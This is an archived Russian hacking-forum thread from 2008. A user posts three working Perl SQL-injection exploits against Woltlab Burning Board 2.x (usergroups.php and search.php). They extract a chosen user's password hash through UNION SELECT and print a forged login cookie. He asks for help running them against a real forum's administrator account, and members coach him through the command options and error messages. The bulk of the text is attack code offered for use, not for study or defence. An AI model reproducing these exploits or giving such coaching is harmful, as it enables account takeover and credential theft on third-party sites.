PDA

Просмотр полной версии : рабочий сплойт, однако что-то не так


Алекс диГриз
30.07.2008, 21:37
использую этот сплойт Для форума woltlab burning board 2.3.6

ввожу соманду perl c:\hack\wbb.pl -U 160 www.site.com

форум лежит на главной странице, ИД админа 160


помогите с командами? а то у меня ошибки выдает



#!/usr/bin/perl

# Woltlab Burning Board 2.X usergroups.php SQL Injection exploit - burned2.pl

# written by x666 <blueshisha@safe-mail.net>

# jmp-esp.kicks-ass.net;blueshisha.chills.it

# SR-CREW

# should work on every wbb regardless of php settings.

#

#

use strict;

use warnings;

use LWP::UserAgent;

use HTTP::Response;

use HTTP::Status;

use Getopt::Std;

getopt('uiUpAcC');

our ( $opt_u, $opt_i, $opt_s, $opt_U, $opt_p, $opt_A, $opt_c, $opt_C );

my $target = shift;

sub do_request($$);

if ( !$target ) { &HELP_MESSAGE; }

if ( !$opt_U && !$opt_C) { &HELP_MESSAGE; }

my ( $host, $folder );



if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ ) {



$host = $1;

$folder = ( $2 ? $2 : '/' );

if ( $folder !~ /\/$/ ) { $folder .= '/'; }

$target = "http://$host$folder" . 'usergroups.php';

}

else { &HELP_MESSAGE; }



my $ip = ( $opt_i ? $opt_i : '127.0.0.1' );

my ( $userid, $userpassword, $proxy, $proxyip );

( $userid, $userpassword ) = split( ':', $opt_U ) if $opt_U;

( $proxy, $proxyip ) = split( ':', $opt_p ) if $opt_p;

my $uid = ( $opt_u ? $opt_u : 1 );

my $useragent =

( $opt_A ? $opt_A : 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );

my $prefix = ( $opt_c ? $opt_c : 'wbb2_' );

my $isHash = 0;



print "burned2.pl written by x666\n";

print "report errors \@ blueshisha\@safe-mail.net.. thx\n";

print "[x] Attacking $target...\n";



if ( $userpassword and $userpassword =~ /([a-f0-9]{32})/ ) { $isHash = 1; }







if ( !$opt_c ) {



my $headers = do_request( '', '' );

if ( $headers =~ /Set-Cookie: (.*?)cookiehash/ ) {

$prefix = $1;

}

else { print $headers}



}



print "[x] Cookie prefix: $prefix\n";





print "[x] Vulnerable check:";



my $answer;

my $pre;

$answer = do_request( '\'', '' );



if ( $answer =~ /FROM (.*?)_applications/ ) {

$pre = $1;

print " Vulnerable\n";




}



elsif ($answer =~ /Ihnen wird der Zutritt zu dieser Seite/

or $answer =~ /Access denied/ )

{

print " No Idea\n";

print "[x] usergroups.php only for users,";

print " wrong userdetails or wrong cookie-prefix!\n" if $opt_U;





exit;

}

else {

print " Not Vulnerable!\n";

print $answer;

exit;

}



print "[x] Unleashing black magic...\n";


$answer = do_request(

'/**/UNIoN/**/ SeLeCT/**/ CoNcAT(password,CHAR(39)),'.$userid.' FROM '.$pre.'_users wHere userid%3D'.$uid.'/*%5D',''

);



if ( $answer =~ /${folder}usergroups.php/ and $answer =~ /([a-f0-9]{32})/ ) {

print "[x] Looks good!\n";

print "[x] Userid: $uid\n";

print "[x] Hash: $1\n";

if ( !$opt_C ) {

print

"[x] Use this Cookie:\n ${prefix}userid=$uid;${prefix}userpassword=$1\n";

}



}

else {

print "[x] Looks bad!\n";

print $answer;



}



sub HELP_MESSAGE() {

print "burned2.pl written by x666\n"

. "perl $0 [options] url\n"

. "examples:\n"

. "perl $0 -U 10:123456 woltlab.de/de/forum/\n"

. "perl $0 -u 2 -i 127.0.0.2 -U 10:123456 woltlab.de/de/forum/\n"

. "overwrite -c only when the auto-check "

. "gives you a false result\n"

. "use -C when you need some special cookies\n"

. "options :\n-u userid of victim [1]\n"

. "-i faked client-ip [127.0.0.1]\n"

. "-U userid:password or userid:pwhash [none]\n"

. "-p proxyip:proxyport [none]\n"

. "-A user-agent [firefox 1.5.09]\n"

. "-c cookie-prefix [auto-check]\n"

. "-C raw cookie\n";


exit;

}



sub do_request($$) {

my $string = shift;

my $otherurl = shift;

if ($otherurl) { $target = "http://$host$folder" . $otherurl; }

else { $target = "http://$host$folder" . 'usergroups.php' }

$string = '/*' if ( !$string );

my $ua = LWP::UserAgent->new;

if ($proxy) { $ua->proxy( 'http', "http://$proxy:$proxyip/" ); }

my $request = new HTTP::Request( 'POST', $target );

$request->content( 'applicationids%5B0)' . $string . '%5D=1'

. '&action=groupleaders_deleteapplications');

$request->authorization_basic('projectb', 'neustart');

$request->content_type('application/x-www-form-urlencoded');

$request->header( 'User-Agent' => $useragent );



if ($opt_U) {

my $userhash;

if ( !$isHash ) { $userhash = md5($userpassword); }

else { $userhash = $userpassword; }

my $cookie = $prefix

. 'userid='

. $userid . ';'

. $prefix

. 'userpassword='

. $userhash;



$request->header( 'Cookie' => $cookie );

}

elsif ($opt_C) {

$request->header( 'Cookie' => $opt_C );

$userid=3265;
}

$request->header( 'Client-Ip' => $ip );

my $response = $ua->request($request);

my $body = $response->content;

my $headers = $response->headers_as_string;



$body = $response->error_as_HTML if ( $response->is_error );



return $headers if ( $string eq '/*' and !$response->is_error );

return $body;

}



# MD5 Code ripped from Libwhisker for bigger portability

# thx rfp :)

{

my ( @S, @T, @M );

my $code = '';



sub md5 {

return undef if ( !defined $_[0] ); # oops, forgot the data

my $DATA = _md5_pad( $_[0] );

&_md5_init() if ( !defined $M[0] );

return _md5_perl_generated( \$DATA );

}



sub _md5_init {

return if ( defined $S[0] );

my $i;

for ( $i = 1 ; $i <= 64 ; $i++ ) {

$T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );

}

my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );

for ( $i = 0 ; $i < 64 ; $i++ ) {

$S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];

}

@M = (

0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,

1, 6, 11, 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12,

5, 8, 11, 14, 1, 4, 7, 10, 13, 0, 3, 6, 9, 12, 15, 2,

0, 7, 14, 5, 12, 3, 10, 1, 8, 15, 6, 13, 4, 11, 2, 9

);

&_md5_generate();

my $TEST = _md5_pad('foobar');



if ( _md5_perl_generated( \$TEST ) ne

'3858f62230ac3c915f300c664312c63f' )

{

die('Error: MD5 self-test not successful.');

}

}



sub _md5_pad {

my $l = length( my $msg = shift() . chr(128) );

$msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );

$l = ( $l - 1 ) * 8;

$msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );

return $msg;

}



sub _md5_generate {

my $N = 'abcddabccdabbcda';

my ( $i, $M ) = ( 0, '' );

$M = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); # mask for 64bit systems

$code = <<EOT;

sub _md5_perl_generated {

BEGIN { \$^H |= 1; }; # use integer

my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcf e,0x10325476);

my (\$a,\$b,\$c,\$d,\$t,\$i);

my \$dr=shift;

my \$l=length(\$\$dr);

for my \$L (0 .. ((\$l/64)-1) ) {

my \@D = unpack('V16', substr(\$\$dr, \$L*64,64));

(\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);

EOT

for ( $i = 0 ; $i < 16 ; $i++ ) {

my ( $a, $b, $c, $d ) =

split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

$code .=

"\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

$code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

}

for ( ; $i < 32 ; $i++ ) {

my ( $a, $b, $c, $d ) =

split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

$code .=

"\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

$code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

}

for ( ; $i < 48 ; $i++ ) {

my ( $a, $b, $c, $d ) =

split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

$code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

$code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

}

for ( ; $i < 64 ; $i++ ) {

my ( $a, $b, $c, $d ) =

split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

$code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

$code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

}

$code .= <<EOT;

\$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff;

\$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff;

} # for

return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); }

EOT

eval "$code";

}

} # md5 package container

# milw0rm.com [2007-03-15]

iSeoBot
30.07.2008, 21:49
у тебя вообще перл где лежит?

Алекс диГриз
30.07.2008, 21:53
C:\Perl
но сами сплойты тут лежат C:\hack

Rubaka
31.07.2008, 00:18
Ошибки в студию!

Алекс диГриз
31.07.2008, 09:07
ну помогите разобраться с ошибками, или с командами помогите плз

aka PSIH
31.07.2008, 10:08
какие ошибки выдает?

p.s:не www.site.com, а http://www.site.com/

Алекс диГриз
31.07.2008, 11:03
http://img253.imageshack.us/img253/3820/98660081fc4.th.png (http://img253.imageshack.us/my.php?image=98660081fc4.png)
вот 2 ошибки, первая ошибка это один форума, вторая ошибка это другой форум. после создания скриншота, писал вместе с http:// и на конце слэш ставил. тоже не помогает.

может быть напишете краткий мануал?

aka PSIH
31.07.2008, 11:14
написано же

perl script.pl [options] url
-U userid: password or userid: pwhash [none]


ты пишешь просто userid -U 160
отсюда
[x] usergroup.php only for users, wrong userdetails or wrong cookie-perifix!


думай ;)

geezer.code
31.07.2008, 11:22
может быть напишете краткий мануал?
print "burned2.pl written by x666\n"
. "perl $0 [options] url\n"
. "examples:\n"
. "perl $0 -U 10:123456 woltlab.de/de/forum/\n"
. "perl $0 -u 2 -i 127.0.0.2 -U 10:123456 woltlab.de/de/forum/\n"
. "overwrite -c only when the auto-check "
. "gives you a false result\n"
. "use -C when you need some special cookies\n"
. "options :\n-u userid of victim [1]\n"
. "-i faked client-ip [127.0.0.1]\n"
. "-U userid:password or userid:pwhash [none]\n"
. "-p proxyip:proxyport [none]\n"
. "-A user-agent [firefox 1.5.09]\n"
. "-c cookie-prefix [auto-check]\n"
. "-C raw cookie\n";

а это тебе чем не мануал ?? и так всьэ опции расписаны.

Алекс диГриз
31.07.2008, 11:27
ладно, ща буду думать =)

а по поводу "[x] usergroup.php only for users, wrong userdetails or wrong cookie-perifix!"
чесно говоря не всё понятно, на сколько я понял - для тех у кого неправильная инфа в профиле или куки префикс. если так, то что делать тогда?
и посмотрите на скрин плз, там вторая ошибка которую я хз как обойти

aka PSIH
31.07.2008, 11:34
а по поводу "[x] usergroup.php only for users, wrong userdetails or wrong cookie-perifix!"
чесно говоря не всё понятно, на сколько я понял - для тех у кого неправильная инфа в профиле или куки префикс. если так, то что делать тогда?
usergroup.php(в котором сама уязвимость sql-inj) доступна только зарегистрированным пользователям => если у тебя появилась эта ошибка, то ты ввел неправильные userid:пароль или неправильный cookie prefix...

и посмотрите на скрин плз, там вторая ошибка которую я хз как обойти
имхо это уже сам сайт глючит, 500 ошибку возвращает... ;)

Алекс диГриз
31.07.2008, 12:17
вот ещё - perl c:\hack\wbb.pl -U hacker:123456 (сам ща зарегился) http://www.site.ru/

он мне выдал какойто длинный похожий на ХТМЛ страницу код, там какой то подозрительный код был похожый на МД5 - если это хэш - то чей??

http://img179.imageshack.us/img179/8044/14549733ez2.th.png (http://img179.imageshack.us/my.php?image=14549733ez2.png)

geezer.code
31.07.2008, 12:30
вот ещё - perl c:\hack\wbb.pl -U hacker:123456 (сам ща зарегился) http://www.site.ru/

он мне выдал какойто длинный похожий на ХТМЛ страницу код, там какой то подозрительный код был похожый на МД5 - если это хэш - то чей??

http://img179.imageshack.us/img179/8044/14549733ez2.th.png (http://img179.imageshack.us/my.php?image=14549733ez2.png)
если действительно .ру то сделай перед запуском сплоита
#chcp 1251
будет видно букаффки ))
хэши которые вижу - это sid - session id . в паролям отношения кажцо не имееют..

Алекс диГриз
31.07.2008, 13:01
а как тогда выдернуть хеш от какого нибудь члена команды допустим администратора или супер модератора?

s1nn3r
04.08.2008, 19:01
конвертируй output 2 file.html а потом в lynx )

Алекс диГриз
05.08.2008, 01:24
а по подробнее, или это был смак?

Глюконатор
05.08.2008, 10:39
Если я правильно понял задумку, то сохрани то что тебе выдал сплойт в файло.htm и открой в браузере (в данном случае lynx, только я не помню чтоб он под винду был..).

Или речь не об этом?

Алекс диГриз
05.08.2008, 12:28
не, там по другому надо решить вопрос с кодировкой...
но дело не в этом, как в таком случаем залезть в Одминку на WBB 2.3.6 ?
я юзал сплойт какойто, там он тупо пишет - exploiting
Hash: ...
и в поле хэша нифига не даёт... может я чёто не так тоже делаю?

сам сплойт
(скажите на него команды плз)

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Response;

$| = 1;
print "
################################################## #
##
## Woltlab Burning Board 2.3.6 <= / Lite Exploit
##
################################################## #
##
## Coded by 666 <http://blueshisha.mutebox.net>
## Bug by trew
##
################################################## #
\n";

if($#ARGV < 0)
{
print "[x] Usage: wbbsploit.pl [Target] [Userid] [Searchstring]\n";
exit;
}
print "<~> Exploiting...\n";
my $url = shift;
my $id = shift;
my $sstring = shift;

my $ua = LWP::UserAgent->new;
my $request = new HTTP::Request('POST', 'http://'.$url.'search.php');
$request->content('searchuser=&name_exactly=1&topiconly=0&showposts=0&searchdate=0&beforeafter=after&sortby=lastpost&sortorder=desc&send=send&sid=&submit=Suchen&boardids%5B%5D=1)%20UNION%20SELECT%20username,pass word%20FROM%20bb1_users%20WHERE%20userid='.$id.'/*&searchstring='.$sstring.'');
$request->content_type('application/x-www-form-urlencoded');
my $response = $ua->request($request);
my $body = $response->content;
print "<~> Hash: ";
$body=~/([a-f0-9]{32})/;
print $1;
print "\n";

вот третий код
тут он тупо пишет -
[x]Attacking http://www.site.org/search.php
[x]Checking wbb version...
[x]Looks like normal wbb (типа не бажный?)
[x]cookie prefix org_
[x] Vulnerable check: Not Vurnelabre!


#!/usr/bin/perl
# Woltlab Burning Board 2.X/Lite search.php SQL Injection exploit - burned.pl
# written by trew <trew@safe-mail.net>
#
# should work on every wbb regardless of php settings.
#
# v 1.2 - added 1337 sql filter evasion, version identification,better regex,raw cookie
# v 1.1 - added wbblite support (thx to lama)
#
#
#
# !PRIVATE! - !PRIVATE!
#
# Leaked by some morons from egocrew
#


use strict; # 1337
use warnings; # 31337
use LWP::UserAgent;
use HTTP::Response;
use HTTP::Status;
use Getopt::Std;
getopt('uisUpAclC');
our ( $opt_u, $opt_i, $opt_s, $opt_U, $opt_p, $opt_A, $opt_c, $opt_l, $opt_C );
my $target = shift;
sub do_request($$);
if ( !$target ) { &HELP_MESSAGE; }
my ( $host, $folder );

if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ ) {

$host = $1;
$folder = ( $2 ? $2 : '/' );
if ( $folder !~ /\/$/ ) { $folder .= '/'; }
$target = "http://$host$folder" . 'search.php';
}
else { &HELP_MESSAGE; }

my $ip = ( $opt_i ? $opt_i : '127.0.0.1' );
my $searchstring = ( $opt_s ? $opt_s : 'board' );
my ( $userid, $userpassword, $proxy, $proxyip );
( $userid, $userpassword ) = split( ':', $opt_U ) if $opt_U;
( $proxy, $proxyip ) = split( ':', $opt_p ) if $opt_p;
my $uid = ( $opt_u ? $opt_u : 1 );
my $useragent =
( $opt_A ? $opt_A : 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
my $prefix = ( $opt_c ? $opt_c : 'wbb2_' );
my $lite = ( $opt_l ? $opt_l : 0 );
my $isHash = 0;

print "burned.pl written by trew\n";
print "report errors \@ trew\@safe-mail.net.. thx\n";
print "[x] Attacking $target...\n";

if ( $userpassword and $userpassword =~ /([a-f0-9]{32})/ ) { $isHash = 1; }

if ( !$lite ) {
print "[x] Checking wbb version...\n";
if ( do_request( '', 'editor.jar' ) =~ /404 Not Found/ ) {

print "[x] Looks like a wbblite\n";
$prefix = "" if ( !$opt_c );
$lite = 1;
}
else { print "[x] Looks like a normal wbb\n"; }
}

if ( !$lite ) {
if ( !$opt_c ) {

my $headers = do_request( '', '' );
if ( $headers =~ /Set-Cookie: (.*?)cookiehash/ ) {
$prefix = $1;
}
else { print $headers}

}
print "[x] Cookie prefix: $prefix\n";
}
print "[x] Vulnerable check:";

my $answer;
my $pre;
$answer = do_request( '\'', '' );

if ( $answer =~ /FROM (.*?)_boards/ ) {
$pre = $1;
print " Vulnerable\n";
}
elsif ($answer =~ /Die Suche ergab keine/
or $answer =~ /No results were found for this search/
or $answer =~ /Your search is invalid/
or $answer =~ /Ihre Suchabfrage ist/ )
{
print " No Idea\n";
print "[x] Searchstring was not found, try a different one with -s\n";
exit;
}
elsif ($answer =~ /Ihnen wird der Zutritt zu dieser Seite/
or $answer =~ /Access denied/ )
{
print " No Idea\n";
print "[x] search.php only for users,";
print " wrong userdetails or wrong cookie-prefix!\n" if $opt_U;
print " give me userid+password with -U\n" if !$opt_U;

exit;
}
else {
print " Not Vulnerable!\n";

#print $answer;
exit;
}

print "[x] Unleashing black magic...\n";
$answer = do_request(
' UNION/*s12s*/ SELECT/*t35s*/ password , password /*er35*/ FRoM ' . $pre
. '_users WHeRE/*esr35*/ userid='
. $uid . '/*',
''
);

if ( $answer =~ /${folder}search.php/ and $answer =~ /([a-f0-9]{32})/ ) {
print "[x] Looks good!\n";
print "[x] Userid: $uid\n";
print "[x] Hash: $1\n";
if ( !$opt_C ) {
print
"[x] Use this Cookie:\n ${prefix}userid=$uid;${prefix}userpassword=$1\n";
}

}
else {
print "[x] Looks bad!\n";
print $answer;

}

sub HELP_MESSAGE() {
print "burned.pl written by trew\n"
. "perl $0 [options] url\n"
. "examples:\n"
. "perl $0 woltlab.de/forum/\n"
. "perl $0 -u 2 -i 127.0.0.2 woltlab.de/de/forum/\n"
. "overwrite -c and -l only when the auto-check "
. "gives you a false result\n"
. "use -C when you need some special cookies\n"
. "options :\n-u userid of victim [1]\n"
. "-i faked client-ip [127.0.0.1]\n"
. "-s searchstring [board]\n"
. "-U userid:password or userid:pwhash [none]\n"
. "-p proxyip:proxyport [none]\n"
. "-A user-agent [firefox 1.5.09]\n"
. "-c cookie-prefix [auto-check]\n"
. "-l wbblite mode [auto-check]\n"
. "-C raw cookie\n";
exit;
}

sub do_request($$) {
my $string = shift;
my $otherurl = shift;
if ($otherurl) { $target = "http://$host$folder" . $otherurl; }
else { $target = "http://$host$folder" . 'search.php' }
$string = '/*' if ( !$string );
my $ua = LWP::UserAgent->new;
if ($proxy) { $ua->proxy( 'http', "http://$proxy:$proxyip/" ); }
my $request = new HTTP::Request( 'POST', $target );
$request->content( 'boardids%5B0%5D=1&boardids%5B1%5D=2,3,4)' . $string
. '&send=1&searchstring='
. $searchstring );
$request->content_type('application/x-www-form-urlencoded');
$request->header( 'User-Agent' => $useragent );

if ($opt_U) {
my $userhash;
if ( !$isHash ) { $userhash = md5($userpassword); }
else { $userhash = $userpassword; }
my $cookie = $prefix
. 'userid='
. $userid . ';'
. $prefix
. 'userpassword='
. $userhash;

$request->header( 'Cookie' => $cookie );
}
elsif ($opt_C) {
$request->header( 'Cookie' => $opt_C );
}
$request->header( 'Client-Ip' => $ip );
my $response = $ua->request($request);
my $body = $response->content;
my $headers = $response->headers_as_string;
$body = $response->error_as_HTML if ( $response->is_error );

return $headers if ( $string eq '/*' and !$response->is_error );
return $body;
}

# MD5 Code ripped from Libwhisker for bigger portability
# thx rfp :)
{
my ( @S, @T, @M );
my $code = '';

sub md5 {
return undef if ( !defined $_[0] ); # oops, forgot the data
my $DATA = _md5_pad( $_[0] );
&_md5_init() if ( !defined $M[0] );
return _md5_perl_generated( \$DATA );
}

sub _md5_init {
return if ( defined $S[0] );
my $i;
for ( $i = 1 ; $i <= 64 ; $i++ ) {
$T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );
}
my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );
for ( $i = 0 ; $i < 64 ; $i++ ) {
$S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];
}
@M = (
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
1, 6, 11, 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12,
5, 8, 11, 14, 1, 4, 7, 10, 13, 0, 3, 6, 9, 12, 15, 2,
0, 7, 14, 5, 12, 3, 10, 1, 8, 15, 6, 13, 4, 11, 2, 9
);
&_md5_generate();
my $TEST = _md5_pad('foobar');

if ( _md5_perl_generated( \$TEST ) ne
'3858f62230ac3c915f300c664312c63f' )
{
die('Error: MD5 self-test not successful.');
}
}

sub _md5_pad {
my $l = length( my $msg = shift() . chr(128) );
$msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );
$l = ( $l - 1 ) * 8;
$msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );
return $msg;
}

sub _md5_generate {
my $N = 'abcddabccdabbcda';
my ( $i, $M ) = ( 0, '' );
$M = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); # mask for 64bit systems
$code = <<EOT;
sub _md5_perl_generated {
BEGIN { \$^H |= 1; }; # use integer
my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcf e,0x10325476);
my (\$a,\$b,\$c,\$d,\$t,\$i);
my \$dr=shift;
my \$l=length(\$\$dr);
for my \$L (0 .. ((\$l/64)-1) ) {
my \@D = unpack('V16', substr(\$\$dr, \$L*64,64));
(\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);
EOT
for ( $i = 0 ; $i < 16 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .=
"\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
for ( ; $i < 32 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .=
"\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
for ( ; $i < 48 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
for ( ; $i < 64 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
$code .= <<EOT;
\$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff;
\$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff;
} # for
return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); }
EOT
eval "$code";
}
} # md5 package container